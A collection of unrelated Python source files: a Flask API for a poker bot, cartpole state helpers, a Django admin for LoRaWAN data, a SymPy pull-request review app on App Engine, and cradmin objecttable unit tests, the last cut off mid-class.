action_probs = action_probs[0]
values = values[0]
action_mask = action_mask[0]
if np.sum(action_probs) > 0:
action_probs *= action_mask
action_probs /= np.sum(action_probs)
# scale values
if np.max(np.abs(values)) > 0:
values *= action_mask
values /= self.env_params['stacksize'] + self.env_params['pot']
model_outputs = {
'action_probs':action_probs.tolist(),
'q_values':[values.tolist()]
}
else:
model_outputs = {
'action_probs':[0]*self.env.action_space,
'q_values':[0]*self.env.action_space
}
print(model_outputs)
print(action_mask)
return model_outputs
def return_player_stats(self):
"""Returns dict of current player stats against the bot."""
query = {
'player':self.player['name']
}
# projection ={'reward':1,'hand_num':1,'_id':0}
player_data = self.db['player_stats'].find(query)
total_hands = self.db['player_stats'].count_documents(query)
results = []
position_results = {'SB':0,'BB':0}
# total_hands = 0
for result in player_data:
results.append(result['reward'])
position_results[result['position']] += result['reward']
bb_per_hand = sum(results) / total_hands if total_hands > 0 else 0
sb_bb_per_hand = position_results['SB'] / total_hands if total_hands > 0 else 0
bb_bb_per_hand = position_results['BB'] / total_hands if total_hands > 0 else 0
player_stats = {
'results':sum(results),
'bb_per_hand':round(bb_per_hand,2),
'total_hands':total_hands,
'SB':round(sb_bb_per_hand,2),
'BB':round(bb_bb_per_hand,2),
}
return player_stats
def parse_env_outputs(self,state,action_mask,betsize_mask,done):
"""Wraps state and passes to frontend. Can be the dummy last state. In which case hero mappings are reversed."""
reward = state[:,-1][:,self.env.state_mapping['hero_stacksize']] - self.env.starting_stack
# cards go in a list
hero = self.env.players[self.player['position']]
villain = self.env.players[self.increment_position[self.player['position']]]
state_object = {
'history' :state.tolist(),
'betsizes' :self.env.betsizes.tolist(),
'mapping' :self.env.state_mapping,
'current_player' :pdt.Globals.POSITION_MAPPING[self.env.current_player],
'hero_stack' :hero.stack,
'hero_position' :pdt.Globals.POSITION_MAPPING[hero.position],
'hero_cards' :flatten(hero.hand),
'hero_street_total' :hero.street_total,
'pot' :float(state[:,-1][:,self.env.state_mapping['pot']][0]),
'board_cards' :state[:,-1][:,self.env.state_mapping['board']][0].tolist(),
'villain_stack' :villain.stack,
'villain_position' :pdt.Globals.POSITION_MAPPING[villain.position],
'villain_cards' :flatten(villain.hand),
'villain_street_total' :villain.street_total,
'last_action' :int(state[:,-1][:,self.env.state_mapping['last_action']][0]),
'last_betsize' :float(state[:,-1][:,self.env.state_mapping['last_betsize']][0]),
'last_position' :int(state[:,-1][:,self.env.state_mapping['last_position']][0]),
'last_aggressive_action' :int(state[:,-1][:,self.env.state_mapping['last_aggressive_action']][0]),
'last_aggressive_betsize' :float(state[:,-1][:,self.env.state_mapping['last_aggressive_betsize']][0]),
'last_aggressive_position' :int(state[:,-1][:,self.env.state_mapping['last_aggressive_position']][0]),
'done' :done,
'action_mask' :action_mask.tolist(),
'betsize_mask' :betsize_mask.tolist(),
'street' :int(state[:,-1][:,self.env.state_mapping['street']][0]),
'blind' :bool(state[:,-1][:,self.env.state_mapping['blind']][0])
}
outcome_object = {
'player1_reward' :hero.stack - self.env.starting_stack,
'player1_hand' :flatten(hero.hand),
'player2_reward' :villain.stack - self.env.starting_stack,
'player2_hand' :flatten(villain.hand),
'player1_handrank' :hero.handrank,
'player2_handrank' :villain.handrank
}
json_obj = {'state':state_object,'outcome':outcome_object}
return json.dumps(json_obj)
def store_state(self,state,obs,action_mask,betsize_mask):
cur_player = self.env.current_player
self.trajectory[cur_player]['states'].append(copy.copy(state))
self.trajectory[cur_player]['action_masks'].append(copy.copy(action_mask))
self.trajectory[cur_player]['betsize_masks'].append(copy.copy(betsize_mask))
def store_actions(self,actor_outputs):
cur_player = self.env.current_player
self.trajectory[cur_player]['actions'].append(actor_outputs['action'])
self.trajectory[cur_player]['action_category'].append(actor_outputs['action_category'])
self.trajectory[cur_player]['action_prob'].append(actor_outputs['action_prob'])
self.trajectory[cur_player]['action_probs'].append(actor_outputs['action_probs'])
self.trajectory[cur_player]['betsize'].append(actor_outputs['betsize'])
self.trajectory[cur_player]['value'].append(actor_outputs['value'])
def query_bot(self,state,obs,action_mask,betsize_mask,done):
while self.env.current_player != self.player['position'] and not done:
actor_outputs = self.actor(state,action_mask,betsize_mask)
critic_outputs = self.critic(obs)
actor_outputs['value'] = critic_outputs['value']
self.insert_model_outputs(actor_outputs,action_mask)
self.store_actions(actor_outputs)
state,obs,done,action_mask,betsize_mask = self.env.step(actor_outputs)
if not done:
self.store_state(state,obs,action_mask,betsize_mask)
return state,obs,done,action_mask,betsize_mask
def reset(self):
assert self.player['name'] is not None
assert isinstance(self.player['position'],str)
self.reset_trajectories()
self.update_player_position(self.increment_position[self.player['position']])
state,obs,done,action_mask,betsize_mask = self.env.reset()
self.store_state(state,obs,action_mask,betsize_mask)
if self.env.current_player != self.player['position'] and not done:
state,obs,done,action_mask,betsize_mask = self.query_bot(state,obs,action_mask,betsize_mask,done)
assert self.env.current_player == self.player['position']
return self.parse_env_outputs(state,action_mask,betsize_mask,done)
def step(self,action:str,betsize:float):
"""Maps action + betsize -> to a flat action category"""
assert self.player['name'] is not None
assert isinstance(self.player['position'],str)
if isinstance(betsize,str):
betsize = float(betsize)
action_type = pdt.Globals.SERVER_ACTION_DICT[action]
flat_action_category,betsize_category = self.env.convert_to_category(action_type,betsize)
assert isinstance(flat_action_category,int)
player_outputs = {
'action':flat_action_category,
'action_category':action_type,
'betsize':betsize_category,
'action_prob':np.array([0]),
'action_probs':np.zeros(self.env.action_space + self.env.betsize_space - 2),
'value':np.zeros(self.env.action_space + self.env.betsize_space - 2)
}
self.store_actions(player_outputs)
state,obs,done,action_mask,betsize_mask = self.env.step(player_outputs)
if not done:
self.store_state(state,obs,action_mask,betsize_mask)
if self.env.current_player != self.player['position']:
state,obs,done,action_mask,betsize_mask = self.query_bot(state,obs,action_mask,betsize_mask,done)
if done:
rewards = self.env.player_rewards()
for position in self.trajectory.keys():
N = len(self.trajectory[position]['betsize_masks'])
self.trajectory[position]['rewards'] = [rewards[position]] * N
self.trajectories[position].append(self.trajectory[position])
self.insert_into_db(self.trajectories)
return self.parse_env_outputs(state,action_mask,betsize_mask,done)
@property
def current_player(self):
return self.player
# instantiate env
api = API()
app = Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app, resources={r"/api/*": {"origins": ["http://localhost:*", "http://71.237.218.23*"]}})  # The second origin should be replaced with the server's public ip
logging.basicConfig(level=logging.DEBUG)
@app.route('/health')
def home():
return 'Server is up and running'
@app.route('/api/player/name',methods=['POST'])
def player():
req_data = json.loads(request.get_data())
api.update_player_name(req_data.get('name'))
return 'Updated Name'
@app.route('/api/player/stats')
def player_stats():
return json.dumps(api.return_player_stats())
@app.route('/api/model/outputs')
def model_outputs():
return json.dumps(api.return_model_outputs())
@app.route('/api/model/load',methods=['POST'])
def load_model():
req_data = json.loads(request.get_data())
api.load_model(req_data.get('path'))
return 'Loaded Model'
@app.route('/api/reset')
def reset():
return api.reset()
@app.route('/api/step', methods=['POST'])
def gen_routes():
log = logging.getLogger(__name__)
log.info(request.get_data())
req_data = json.loads(request.get_data())
action = req_data.get('action')
betsize = req_data.get('betsize')
log.info(f'action {action}')
log.info(f'betsize {betsize}')
return api.step(action,betsize)
if __name__ == '__main__':
app.run(debug=True, port=4000)
|
from types import SimpleNamespace
import numpy as np
STATE_VARIABLES = np.sort(
["angle", "angleD", "angle_cos", "angle_sin", "position", "positionD",]
)
STATE_INDICES = {x: np.where(STATE_VARIABLES == x)[0][0] for x in STATE_VARIABLES}
CONTROL_INPUTS = np.sort(["Q"])
CONTROL_INDICES = {x: np.where(CONTROL_INPUTS == x)[0][0] for x in CONTROL_INPUTS}
"""Define indices of values in state statically"""
ANGLE_IDX = STATE_INDICES["angle"].item()
ANGLED_IDX = STATE_INDICES["angleD"].item()
POSITION_IDX = STATE_INDICES["position"].item()
POSITIOND_IDX = STATE_INDICES["positionD"].item()
ANGLE_COS_IDX = STATE_INDICES["angle_cos"].item()
ANGLE_SIN_IDX = STATE_INDICES["angle_sin"].item()
def create_cartpole_state(state: dict = None, dtype=None) -> np.ndarray:
"""
Constructor of cartpole state from named arguments. The order of variables is fixed in STATE_VARIABLES.
Input parameters are passed as a dict with the following possible keys. Other keys are ignored.
Unset key-value pairs are initialized to 0.
:param angle: Pole angle. 0 means pole is upright. Clockwise angle rotation is defined as negative.
:param angleD: Angular velocity of pole.
:param position: Horizontal position of pole.
:param positionD: Horizontal velocity of pole. Cart movement to the right is positive.
:returns: A numpy.ndarray with values filled in order set by STATE_VARIABLES
"""
state["angle_cos"] = (
np.cos(state["angle"]) if "angle" in state.keys() else np.cos(0.0)
)
state["angle_sin"] = (
np.sin(state["angle"]) if "angle" in state.keys() else np.sin(0.0)
)
if dtype is None:
dtype = np.float32
s = np.zeros_like(STATE_VARIABLES, dtype=dtype)
for i, v in enumerate(STATE_VARIABLES):
s[i] = state.get(v) if v in state.keys() else s[i]
return s
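# A minimal usage sketch (commented out, mirroring the test snippets at the bottom of this file;
# the values are arbitrary). Unset variables default to 0, and angle_cos/angle_sin are derived
# from "angle":
# s = create_cartpole_state({"angle": 0.1, "positionD": -0.5})
# s[ANGLE_IDX] -> 0.1, s[ANGLE_COS_IDX] -> cos(0.1), s[POSITIOND_IDX] -> -0.5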
# THE FUNCTIONS BELOW ARE POTENTIALLY SLOW!
def cartpole_state_varname_to_index(variable_name: str) -> int:
return STATE_INDICES[variable_name]
def cartpole_state_index_to_varname(index: int) -> str:
return STATE_VARIABLES[index]
def cartpole_state_varnames_to_indices(variable_names: list) -> list:
indices = []
for variable_name in variable_names:
indices.append(cartpole_state_varname_to_index(variable_name))
return indices
def cartpole_state_indices_to_varnames(indices: list) -> list:
varnames = []
for index in indices:
varnames.append(cartpole_state_index_to_varname(index))
return varnames
def cartpole_state_namespace_to_vector(s_namespace: SimpleNamespace) -> np.ndarray:
s_array = np.zeros_like(STATE_VARIABLES, dtype=np.float32)
for a in STATE_VARIABLES:
s_array[cartpole_state_varname_to_index(a)] = getattr(
s_namespace, a, s_array[cartpole_state_varname_to_index(a)]
)
return s_array
def cartpole_state_vector_to_namespace(s_vector: np.ndarray) -> SimpleNamespace:
s_namespace = SimpleNamespace()
for i, a in enumerate(STATE_VARIABLES):
setattr(s_namespace, a, s_vector[i])
return s_namespace
# # Test functions
# s = create_cartpole_state(dict(angleD=12.1, angleDD=-33.5, position=2.3, positionD=-19.77, positionDD=3.42))
# s[POSITIOND_IDX] = -14.9
# cartpole_state_index_to_varname(4)
# sn = SimpleNamespace()
# sn.position=23.55
# sn.angleDD=4.11
# sn.eew = -1.22
# q = cartpole_state_namespace_to_vector(sn)
# v = cartpole_state_vector_to_namespace(q)
# print(s)
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import User
from api.models import Gateway
from api.models import Point
from api.models import Node
from api.models import NodeType
from api.models import Key
from api.models import Rawpoint
from api.models import Profile
from api.models import LoRaWANRawPoint
from api.models import LoRaWANApplication
from api.models import ABP
class ProfileInline(admin.StackedInline):
model = Profile
show_change_link = True
class UserAdmin(BaseUserAdmin):
inlines = ( ProfileInline, )
class GatewayAdmin(admin.ModelAdmin):
list_display = ('id', 'mac', 'owner', 'serial', 'location', 'gps_lon', 'gps_lat')
class RawpointAdmin(admin.ModelAdmin):
list_display = ('id', 'seq_number', 'timestamp', 'payload', 'rssi', 'snr', 'node_id', 'gw', 'gateway_serial', 'state')
list_filter = ('node_id', 'gw', 'gateway_serial')
class LoRaWANRawPointAdmin(admin.ModelAdmin):
list_display = ('id', 'DevAddr')
list_filter = ('DevAddr', 'datr', 'chan')
class PointAdmin(admin.ModelAdmin):
list_display = ('id', 'rawpoint_id', 'key', 'value', 'timestamp', 'node_id', 'gw')
list_filter = ('gw', 'node_id', 'key')
search_fields = ('gw__description', 'node__name')
raw_id_fields = ('rawpoint', )
class KeyAdmin(admin.ModelAdmin):
list_display = ('numeric', 'key', 'unit')
class NodeAdmin(admin.ModelAdmin):
list_display = ('node_id', 'owner', 'name', 'description', 'api_key', 'nodetype')
admin.site.register(Gateway, GatewayAdmin)
admin.site.register(Node, NodeAdmin)
admin.site.register(NodeType)
admin.site.register(Key, KeyAdmin)
admin.site.register(Point, PointAdmin)
admin.site.register(Rawpoint, RawpointAdmin)
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
admin.site.register(LoRaWANRawPoint, LoRaWANRawPointAdmin)
admin.site.register(LoRaWANApplication)
admin.site.register(ABP)
|
import os
from datetime import datetime
import logging
import sys
import traceback
from random import random
import urllib2
from google.appengine.dist import use_library
use_library("django", "1.2")
from django.utils import simplejson as json
from google.appengine.ext import webapp, db
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import taskqueue
from jsonrpc_client import JSONRPCService, JSONRPCError
from jsonrpc_server import JSONRPCServer
from models import PullRequest, Task, User, UploadURL
from github import (github_get_pull_request_all_v2,
github_get_pull_request_all_v3, github_get_pull_request,
github_get_user)
from utils import pretty_date
dev_server = os.environ["SERVER_SOFTWARE"].startswith("Development")
if dev_server:
url_base = "http://localhost:8080"
else:
url_base = "http://reviews.sympy.org"
# default github user and repo
polled_user = "sympy"
polled_repo = "sympy"
class RequestHandler(webapp.RequestHandler):
def render(self, temp, data=None):
"""
Renders the template "temp" with data 'data'.
Handles default data fields, as well as path to the templates.
"""
name, _ = os.path.splitext(temp)
d = {
'dev_server': dev_server,
name + '_selected': "selected",
}
if data is not None:
d.update(data)
path = os.path.join(os.path.dirname(__file__), "..", "templates", temp)
s = template.render(path, d)
self.response.out.write(s)
class MainPage(RequestHandler):
def get(self):
q = PullRequest.all()
q.order("last_updated")
# This is the request that wasn't updated for the longest time:
p = q.get()
if p is None:
last_update = None
last_update_pretty = "never"
else:
last_update = p.last_updated
last_update_pretty = pretty_date(last_update)
q = PullRequest.all()
q.filter("state =", "open")
q.order("last_updated")
# This is the open request that wasn't updated for the longest time:
p = q.get()
if p is None:
last_quick_update = None
last_quick_update_pretty = "never"
else:
last_quick_update = p.last_updated
last_quick_update_pretty = pretty_date(last_quick_update)
p_mergeable = PullRequest.all()
p_mergeable.filter("mergeable =", True)
p_mergeable.filter("state =", "open")
p_mergeable.order("-created_at")
p_nonmergeable = PullRequest.all()
p_nonmergeable.filter("mergeable =", False)
p_nonmergeable.filter("state =", "open")
p_nonmergeable.order("-created_at")
self.render("index.html", {
"pullrequests_mergeable": p_mergeable,
"pullrequests_nonmergeable": p_nonmergeable,
"last_update": last_update,
"last_update_pretty": last_update_pretty,
"last_quick_update": last_quick_update,
"last_quick_update_pretty": last_quick_update_pretty,
})
class ClosedPullRequestsPage(RequestHandler):
def get(self):
p_closed = PullRequest.all()
p_closed.filter("state =", "closed")
p_closed.order("-created_at")
self.render("closed_pullrequests.html", {
"pullrequests_closed": p_closed,
})
class PullRequestPage(RequestHandler):
def get(self, num):
p = PullRequest.all()
p.filter("num =", int(num))
p = p.get()
t = p.task_set
t.order("uploaded_at")
self.render("pullrequest.html", {'p': p, 'tasks': t})
class ReportPage(RequestHandler):
def get(self, id):
t = Task.get(id)
logging.info(t.log)
self.render("report.html", {'task': t})
class AsyncHandler(webapp.RequestHandler):
def get(self):
self.response.out.write("AsyncHandler.")
def post(self):
def upload_task(num, result, interpreter, testcommand, log):
p = PullRequest.all()
p.filter("num =", int(num))
p = p.get()
if p is None:
# Create the pull request:
p = PullRequest(num=num)
p.put()
t = Task(pullrequest=p)
t.result = result
t.interpreter = interpreter
t.testcommand = testcommand
t.log = log
t.put()
result = {
"ok": True,
"task_url": "%s/report/%s" % (url_base, t.key())
}
return result
s = JSONRPCServer({
"RPC.upload_task": upload_task,
})
output = s.handle_request_from_client(self.request.body)
self.response.out.write(output)
class UploadPull(RequestHandler):
def post(self, url_path):
last_row = UploadURL.all().order("-created_at").get()
if last_row:
if last_row.url_path == url_path:
try:
payload = json.loads(self.request.get("payload"))
logging.info(payload)
except json.JSONDecodeError:
                    self.error(400)
                    self.response.out.write("Incorrect request format\n")
                    return
user_repo = payload["repository"]["full_name"]
# Download complete pull request with information about mergeability
pull_request = github_get_pull_request(user_repo, payload["number"])
num = payload["number"]
# Get the old entity or create a new one:
p = PullRequest.all()
p.filter("num =", int(num))
p = p.get()
if p is None:
p = PullRequest(num=num)
# Update all data that we can from GitHub:
p.url = pull_request["html_url"]
p.state = pull_request["state"]
p.title = pull_request["title"]
p.body = pull_request["body"]
p.mergeable = pull_request["mergeable"]
if pull_request["head"]["repo"]:
p.repo = pull_request["head"]["repo"]["url"]
p.branch = pull_request["head"]["ref"]
p.author_name = pull_request["user"].get("name", "")
p.author_email = pull_request["user"].get("email", "")
created_at = pull_request["created_at"]
created_at = datetime.strptime(created_at, "%Y-%m-%dT%H:%M:%SZ")
p.created_at = created_at
u = User.all()
u.filter("login =", pull_request["user"]["login"])
u = u.get()
if u is None:
u = User(login=pull_request["user"]["login"])
u.id = pull_request["user"]["id"]
u.avatar_url = pull_request["user"]['avatar_url']
u.url = pull_request["user"]["url"]
u.put()
p.author = u
p.put()
else:
self.error(404)
self.response.out.write("Requesting URL doesn't exist\n")
else:
self.error(500)
self.response.out.write("URL for posting data not defined yet\n")
def get(self, url_path):
def notify_admins(user, new_url):
from google.appengine.api.mail import send_mail_to_admins
mail = user.email()
subject = "SymPy bot notification"
body = "New upload URL " + new_url
send_mail_to_admins(sender=mail, subject=subject, body=body)
from google.appengine.api import users
user = users.get_current_user()
is_admin = users.is_current_user_admin()
rows = []
upload_url = ""
if user:
if is_admin:
if self.request.get("generate"):
import sha
rand_string = os.urandom(10)
sha_hash = sha.new(rand_string)
new_record = UploadURL(url_path=sha_hash.hexdigest(), user=user.nickname())
new_record.put()
new_url = self.request.host_url + "/upload_pull/" + \
sha_hash.hexdigest()
notify_admins(user, new_url)
if self.request.get("populate"):
taskqueue.add(url="/worker", queue_name="github")
rows = UploadURL.all()
last_row = rows.order("-created_at").get()
if last_row:
upload_url = (last_row.url_path)
else:
upload_url = ("")
self.render("upload_url.html", {"user": user,
"upload_url": upload_url,
"is_admin": is_admin,
"rows": rows,
"login_url": users.create_login_url("/upload_pull"),
"logout_url": users.create_logout_url("/upload_pull"),
}
)
class Worker(webapp.RequestHandler):
"""
    This class is used to populate the pull requests and users database
    (called when an admin presses the "Populate" button).
"""
def post(self):
user_repo = polled_user + "/" + polled_repo
payload = github_get_pull_request_all_v3(user_repo)
# checkout mergeability
for pos in xrange(len(payload)):
pull = github_get_pull_request(user_repo, payload[pos]["number"])
payload[pos]["mergeable"] = pull["mergeable"]
# Process each pull request from payload
for pull in payload:
p = PullRequest.all()
num = pull["number"]
p.filter("num =", num)
p = p.get()
if p is None:
p = PullRequest(num=num)
p.url = pull["html_url"]
p.state = pull["state"]
p.title = pull["title"]
p.body = pull["body"]
p.mergeable = pull["mergeable"]
if pull["head"]["repo"]:
p.repo = pull["head"]["repo"]["url"]
p.branch = pull["head"]["ref"]
created_at = pull["created_at"]
created_at = datetime.strptime(created_at, "%Y-%m-%dT%H:%M:%SZ")
p.created_at = created_at
# Collect public information about user
u = User.all()
login = pull["user"]["login"]
u.filter("login =", login)
u = u.get()
if u is None:
u = User(login=login)
u.id = pull["user"]["id"]
u.avatar_url = pull["user"]["avatar_url"]
u.url = pull["user"]["url"]
u.put()
p.author = u
p.put()
def main():
urls = [
('/', MainPage),
('/closed_pullrequests/?', ClosedPullRequestsPage),
('/async/?', AsyncHandler),
('/pullrequest/(\d+)/?', PullRequestPage),
('/report/(.*)/?', ReportPage),
('/worker/?', Worker),
('/upload_pull/?(.*)/?', UploadPull),
]
application = webapp.WSGIApplication(urls, debug=True)
run_wsgi_app(application)
|
from __future__ import unicode_literals
from builtins import str
from builtins import range
import htmls
from cradmin_legacy.python2_compatibility import mock
from django.test import TestCase, RequestFactory
from cradmin_legacy.tests.viewhelpers.cradmin_viewhelpers_testapp.models import TestModel
from cradmin_legacy.viewhelpers import objecttable
from cradmin_legacy.cradmin_legacy_testapp import models as testmodels
class TestColumn(TestCase):
def setUp(self):
class TestColSubclass(objecttable.Column):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
self.model_testobject = TestModel()
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
def test_get_header_not_implemented(self):
test = objecttable.Column(view=None, columnindex=0)
with self.assertRaises(NotImplementedError):
test.get_header()
def test_get_header(self):
self.assertEqual("Test Value", self.column_subclass.get_header())
def test_render_value(self):
self.model_testobject.testfield = u'test_value'
self.assertEqual("test_value", self.column_subclass.render_value(self.model_testobject))
# check that you get an exception when running render_value without having modelfield..
def test_render_value_not_implemented(self):
col = objecttable.Column(view=None, columnindex=0)
with self.assertRaises(NotImplementedError):
col.render_value(None)
# check that you get an exception when running render_cell_content without overriding with subclass..
def test_render_cell_not_implemented(self):
col = objecttable.Column(view=mock.MagicMock(), columnindex=0)
with self.assertRaises(NotImplementedError):
col.render_cell_content(None)
class TestPlainTextColumn(TestCase):
def setUp(self):
class TestColSubclass(objecttable.PlainTextColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
self.model_testobject = TestModel()
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
def test_render_cell(self):
self.model_testobject.testfield = 'test_value'
self.assertEqual(
'<span class="objecttable-cellvalue">test_value</span>',
self.column_subclass.render_cell_content(self.model_testobject).strip())
class TestSingleActionColumn(TestCase):
def setUp(self):
class TestIncompleteColSubclass(objecttable.SingleActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestIncompleteColSubclass, self).__init__(**kwargs)
class TestColSubclass(objecttable.SingleActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
def get_actionurl(self, obj):
return 'www.example.com/{}'.format(obj.testfield)
self.model_testobject = TestModel(testfield="test_value")
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
self.column_subclass_incomplete = TestIncompleteColSubclass(view=view, columnindex=0)
def test_get_actionurl_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.get_actionurl(self.model_testobject)
def test_render_cell_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.render_cell_content(self.model_testobject)
def test_render_cell(self):
expected = '<a href="www.example.com/test_value" class="objecttable-cellvalue-link">test_value</a>'
self.assertEqual(self.column_subclass.render_cell_content(self.model_testobject), expected)
class TestMultiActionColumn(TestCase):
def setUp(self):
class TestIncompleteColSubclass(objecttable.MultiActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestIncompleteColSubclass, self).__init__(**kwargs)
class TestColSubclass(objecttable.MultiActionColumn):
modelfield = 'testfield'
def __init__(self, **kwargs):
super(TestColSubclass, self).__init__(**kwargs)
def get_buttons(self, obj):
return [objecttable.Button(label="Btn1", url="www.example.com/btn1"),
objecttable.Button(label="Btn2", url="www.example.com/btn2")]
self.model_testobject = TestModel(testfield="test_value")
view = mock.MagicMock()
view.model = self.model_testobject
self.column_subclass = TestColSubclass(view=view, columnindex=0)
self.column_subclass_incomplete = TestIncompleteColSubclass(view=view, columnindex=0)
def test_get_buttons_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.get_buttons(self.model_testobject)
def test_render_cell_ExceptionRaised(self):
with self.assertRaises(NotImplementedError):
self.column_subclass_incomplete.render_cell_content(self.model_testobject)
def test_render_cell(self):
result = self.column_subclass.render_cell_content(self.model_testobject)
selector = htmls.S(result)
self.assertEqual(selector.one('p.objecttable-cellvalue').alltext_normalized,
'test_value')
self.assertTrue(selector.exists('p.objecttable-cellbuttons'))
self.assertEqual(selector.count('a'), 2)
class TestButton(TestCase):
def test_render_with_icon_and_class(self):
btn = objecttable.Button(
label="My Btn", url="www.example.com/mybtnurl",
buttonclass="btn btn-danger btn-sm",
icon="glyphicon glyphicon-shopping-cart")
selector = htmls.S(btn.render())
self.assertEqual(selector.one('a')['href'], 'www.example.com/mybtnurl')
self.assertEqual(selector.one('a')['class'], 'btn btn-danger btn-sm')
self.assertEqual(selector.one('a').alltext_normalized, 'My Btn')
self.assertEqual(selector.one('a span')['class'], 'glyphicon glyphicon-shopping-cart')
def test_render_simple(self):
btn = objecttable.Button(label="My Btn", url="www.example.com/mybtnurl")
selector = htmls.S(btn.render())
self.assertEqual(selector.one('a')['href'], 'www.example.com/mybtnurl')
self.assertEqual(selector.one('a')['class'], 'btn btn-default btn-sm')
self.assertEqual(selector.one('a').alltext_normalized, 'My Btn')
class TestOrderingStringParser(TestCase):
def test_parse_empty(self):
orderingqueryarg = objecttable.OrderingStringParser('')
self.assertEqual(len(orderingqueryarg.orderingdict), 0)
def test_parse_single(self):
orderingqueryarg = objecttable.OrderingStringParser('a3')
self.assertEqual(len(orderingqueryarg.orderingdict), 1)
self.assertTrue(orderingqueryarg.orderingdict[3])
def test_parse_multi(self):
orderingqueryarg = objecttable.OrderingStringParser('a3.d1')
self.assertEqual(len(orderingqueryarg.orderingdict), 2)
self.assertTrue(orderingqueryarg.orderingdict[3].order_ascending)
self.assertFalse(orderingqueryarg.orderingdict[1].order_ascending)
def test_remove_column(self):
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').remove_column(6),
'a3.d1')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').remove_column(1),
'a3.a6')
def test_remove_nonexisting_colum(self):
self.assertEqual(
objecttable.OrderingStringParser('').remove_column(2),
'')
self.assertEqual(
objecttable.OrderingStringParser('a1').remove_column(2),
'a1')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').remove_column(2),
'a3.d1.a6')
def test_flip_existing_column(self):
self.assertEqual(
objecttable.OrderingStringParser('d1').flip_column(1),
'a1')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').flip_column(1),
'a3.a1.a6')
self.assertEqual(
objecttable.OrderingStringParser('a3.d1.a6').flip_column(3),
'd3.d1.a6')
def test_flip_new_column(self):
self.assertEqual(
objecttable.OrderingStringParser('').flip_column(1),
'a1')
self.assertEqual(
objecttable.OrderingStringParser('a3').flip_column(1),
'a3.a1')
class TestObjectTableView(TestCase):
def setUp(self):
self.factory = RequestFactory()
def _mock_request(self, request):
request.cradmin_role = mock.MagicMock()
request.cradmin_app = mock.MagicMock()
def test_empty(self):
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.none()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper').prettyprint()
self.assertFalse(selector.exists('#objecttableview-table'))
self.assertEqual(
selector.one('#objecttableview-no-items-message').alltext_normalized,
'No some items')
def test_empty_hide_search(self):
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
searchfields = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.none()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertFalse(selector.exists('.cradmin-searchform'))
def test_paginate_by_singlepage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(4)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 4)
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager'))
def test_paginate_by_firstpage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(5)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 4)
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .previous.disabled'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .next'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .next.disabled'))
def test_paginate_by_lastpage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(5)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'page': 2
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .previous'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .previous.disabled'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .next.disabled'))
def test_paginate_by_middlepage(self):
testmodels.SomeItem.objects.bulk_create(
[testmodels.SomeItem(name=str(x)) for x in range(9)])
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
